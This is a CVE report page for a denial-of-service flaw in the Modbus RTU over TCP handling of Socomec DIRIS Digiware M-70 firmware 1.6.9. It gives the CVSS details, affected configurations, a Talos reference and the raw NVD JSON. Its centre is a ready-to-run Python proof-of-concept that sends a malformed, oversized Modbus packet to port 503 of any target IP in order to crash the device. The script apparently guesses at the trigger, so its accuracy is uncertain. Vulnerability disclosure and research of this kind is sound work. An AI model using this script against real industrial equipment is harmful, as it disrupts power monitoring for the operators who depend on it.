Security Vulnerability Report
CVE-2025-55222 CVSS 8.6 HIGH

CVE-2025-55222

Published: 2025-12-01 16:15:55
Last Modified: 2025-12-05 20:48:02

Description

A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP USB Function functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability. This vulnerability is specific to the malicious message sent via Modbus RTU over TCP on port 503.

CVSS Details

CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:* - NOT VULNERABLE
Socomec DIRIS Digiware M-70 firmware version < 1.6.9
Socomec DIRIS Digiware M-70 1.6.9 (known affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-55222 PoC - Modbus RTU over TCP DoS for Socomec DIRIS Digiware M-70
Reference: https://www.cve.org/CVERecord?id=CVE-2025-55222
"""
import socket
import struct
import sys


def create_modbus_rtu_packet(function_code, data):
    """
    Create a Modbus RTU over TCP packet

    Modbus RTU over TCP format:
    - Transaction ID (2 bytes)
    - Protocol ID (2 bytes)
    - Length (2 bytes)
    - Unit ID (1 byte)
    - Function Code (1 byte)
    - Data (variable)
    """
    transaction_id = 0x0001
    protocol_id = 0x0000
    unit_id = 0x01

    # Build PDU (Protocol Data Unit)
    pdu = struct.pack('B', function_code) + data

    # Build ADU (Application Data Unit)
    length = 1 + len(pdu)  # Unit ID + PDU length
    adu = struct.pack('>HHH', transaction_id, protocol_id, length)
    adu += struct.pack('B', unit_id)
    adu += pdu
    return adu


def send_malicious_packet(target_ip, target_port=503):
    """
    Send a crafted Modbus RTU over TCP packet to trigger DoS
    This packet is designed to cause service disruption
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(5)

    try:
        sock.connect((target_ip, target_port))

        # Craft malicious packet with malformed data
        # Using function code 0x65 (custom) with excessive data length
        malicious_data = b'\x41' * 500  # Excessive length data
        packet = create_modbus_rtu_packet(0x65, malicious_data)

        print(f"[*] Sending malicious packet to {target_ip}:{target_port}")
        print(f"[*] Packet length: {len(packet)} bytes")

        sock.send(packet)
        print("[+] Packet sent successfully")
        print("[*] Target may be experiencing DoS condition")

    except socket.error as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 503
    send_malicious_packet(target, port)

References

https://talosintelligence.com/vulnerability_reports/TALOS-2025-2251 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55222", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:54.620", "lastModified": "2025-12-05T20:48:02.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP USB Function functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.This vulnerability is specific to the malicious message sent via Modbus RTU over TCP on port 503."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:*", "matchCriteriaId": "C07608BE-E7E3-44F5-AE9A-4AE36679F58A"}]}, {"operator": "OR", "negate": 
false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:*", "matchCriteriaId": "153A9D26-2C76-4B6B-AFD8-22DEB2081F34"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2251", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}